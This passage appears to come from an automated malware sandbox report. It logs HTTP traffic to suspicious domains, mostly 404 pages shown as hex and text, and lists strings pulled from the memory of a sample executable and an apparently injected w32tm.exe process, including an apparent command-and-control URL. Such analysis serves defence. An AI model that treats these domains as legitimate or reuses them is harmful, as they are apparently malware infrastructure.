65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Jan 2025 15:04:10 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Jan 2025 15:04:12 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Jan 2025 15:04:15 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Jan 2025 15:04:17 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404">
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 06 Jan 2025 15:04:27 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f c3 30 0c 85 ef fd 15 66 27 38 10 97 a9 93 38 58 91 60 ed c4 a4 32 2a 48 0f 1c 03 31 4a a5 d1 94 24 5b 81 5f 4f da 09 69 17 4b cf fe 9e f5 1e 5d 94 4f 6b f5 da 54 f0 a0 1e 6b 68 da fb 7a bb 86 c5 35 e2 b6 52 1b c4 52 95 a7 cb 52 e4 88 d5 6e 21 33 b2 f1 73 2f c9 b2 36 49 c4 2e ee 59 16 79 01 3b 17 61 e3 0e bd 21 3c 2d 33 c2 19 a2 37 67 7e 26 df 8d 3c 63 92 ca 68 90 ca 32 78 fe 3a 70 88 6c a0 7d ae 61 d4 01 fa c4 7d 4c 1c b8 1e a2 ed 02 04 f6 47 f6 82 70 98 3e f9 34 b4 31 9e 43 90 77 83 7e b7 8c 4b 51 88 d5 0a 2e db be fb be 82 97 19 07 1d 61 1c 47 11 dc f1 57 0c de 41 e3 7c 84 db 9c f0 df 9c 32 ce e9 52 9e a9 55 f6 07 a8 23 d4 61 10 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e6MAO0f'88X`2*H1J$[_OiK]OkTkhz5RRRn!3s/6I.Yy;a!<-37g~&<ch2x:pl}a}LGp>41Cw~KQ.aGWA\|2RU#a0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 06 Jan 2025 15:04:29 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f c3 30 0c 85 ef fd 15 66 27 38 10 97 a9 93 38 58 91 60 ed c4 a4 32 2a 48 0f 1c 03 31 4a a5 d1 94 24 5b 81 5f 4f da 09 69 17 4b cf fe 9e f5 1e 5d 94 4f 6b f5 da 54 f0 a0 1e 6b 68 da fb 7a bb 86 c5 35 e2 b6 52 1b c4 52 95 a7 cb 52 e4 88 d5 6e 21 33 b2 f1 73 2f c9 b2 36 49 c4 2e ee 59 16 79 01 3b 17 61 e3 0e bd 21 3c 2d 33 c2 19 a2 37 67 7e 26 df 8d 3c 63 92 ca 68 90 ca 32 78 fe 3a 70 88 6c a0 7d ae 61 d4 01 fa c4 7d 4c 1c b8 1e a2 ed 02 04 f6 47 f6 82 70 98 3e f9 34 b4 31 9e 43 90 77 83 7e b7 8c 4b 51 88 d5 0a 2e db be fb be 82 97 19 07 1d 61 1c 47 11 dc f1 57 0c de 41 e3 7c 84 db 9c f0 df 9c 32 ce e9 52 9e a9 55 f6 07 a8 23 d4 61 10 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e6MAO0f'88X`2*H1J$[_OiK]OkTkhz5RRRn!3s/6I.Yy;a!<-37g~&<ch2x:pl}a}LGp>41Cw~KQ.aGWA\|2RU#a0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Mon, 06 Jan 2025 15:04:31 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 272Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 6f 76 7a 2e 70 72 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.sovz.pro Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Mon, 06 Jan 2025 15:04:45 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2025-01-06T15:04:50.5333945Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 06 Jan 2025 15:05:48 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a

Source: CdarBkjFTHWBQ.exe, 00000006.00000002.3923632422.000000000525E000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.u75lmwdgp0du.homes
Source: CdarBkjFTHWBQ.exe, 00000006.00000002.3923632422.000000000525E000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.u75lmwdgp0du.homes/8m3y/
Source: w32tm.exe, 00000004.00000003.1831361665.00000000080FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: w32tm.exe, 00000004.00000003.1831361665.00000000080FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: w32tm.exe, 00000004.00000003.1831361665.00000000080FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: w32tm.exe, 00000004.00000003.1831361665.00000000080FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: w32tm.exe, 00000004.00000003.1831361665.00000000080FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: w32tm.exe, 00000004.00000003.1831361665.00000000080FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
